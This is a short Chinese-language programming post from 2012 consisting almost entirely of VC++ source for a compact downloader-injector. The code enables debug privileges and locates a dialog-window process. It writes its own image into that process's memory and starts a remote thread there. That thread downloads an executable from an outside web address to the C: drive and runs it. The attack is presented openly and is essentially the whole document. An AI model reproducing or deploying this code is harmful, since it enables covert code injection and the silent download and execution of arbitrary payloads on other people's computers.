VC++1.5K字节实现下载并远程注入

来源:岁月联盟 编辑:exp 时间:2012-08-16
[cpp]
#pragma comment(linker,"/BASE:0x13140000 /ENTRY:InjectPro /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078")     
#pragma comment(lib, "urlmon.lib")     
#include <windows.h>     
    
void InjectMemo()    
    
{    
    URLDownloadToFile(0, "http://www.fi7ke.com/upiea.exe", TEXT("C:/upiea.exe"), 0, 0);    
    WinExec("c:/upiea.exe", SW_SHOW);    
    ExitThread(0);    
}    
    
void GetDebugPrivs()    
{    
    HANDLE hToken;    
    DWORD ReGvl;    
    TOKEN_PRIVILEGES Ttges;    
    
    if (OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))    
    {    
        LookupPrivilegeValue(NULL, "SeDebugPrivilege", &Ttges.Privileges[0].Luid);    
        Ttges.PrivilegeCount=1;    
        Ttges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;    
        AdjustTokenPrivileges(hToken, FALSE, &Ttges, 0,(PTOKEN_PRIVILEGES)NULL, &ReGvl);    
    }    
}    
    
void InjectPro()    
{    
    DWORD Size,PID;    
    PBYTE module;    
    module = (PBYTE)GetModuleHandle(0);    
    Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage;    
    HANDLE ProcessHandle;    
    LPVOID heart;    
    GetDebugPrivs();    
    GetWindowThreadProcessId(FindWindow("#32770", NULL), &PID);    
    ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);    
    VirtualFreeEx(ProcessHandle, module, 0, MEM_RELEASE);    
    heart = VirtualAllocEx(ProcessHandle, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    
    WriteProcessMemory(ProcessHandle, heart, module, Size, NULL);    
    CreateRemoteThread(ProcessHandle, 0, 0, (LPTHREAD_START_ROUTINE)InjectMemo, module, 0, NULL);    
}   
作者:yincheng01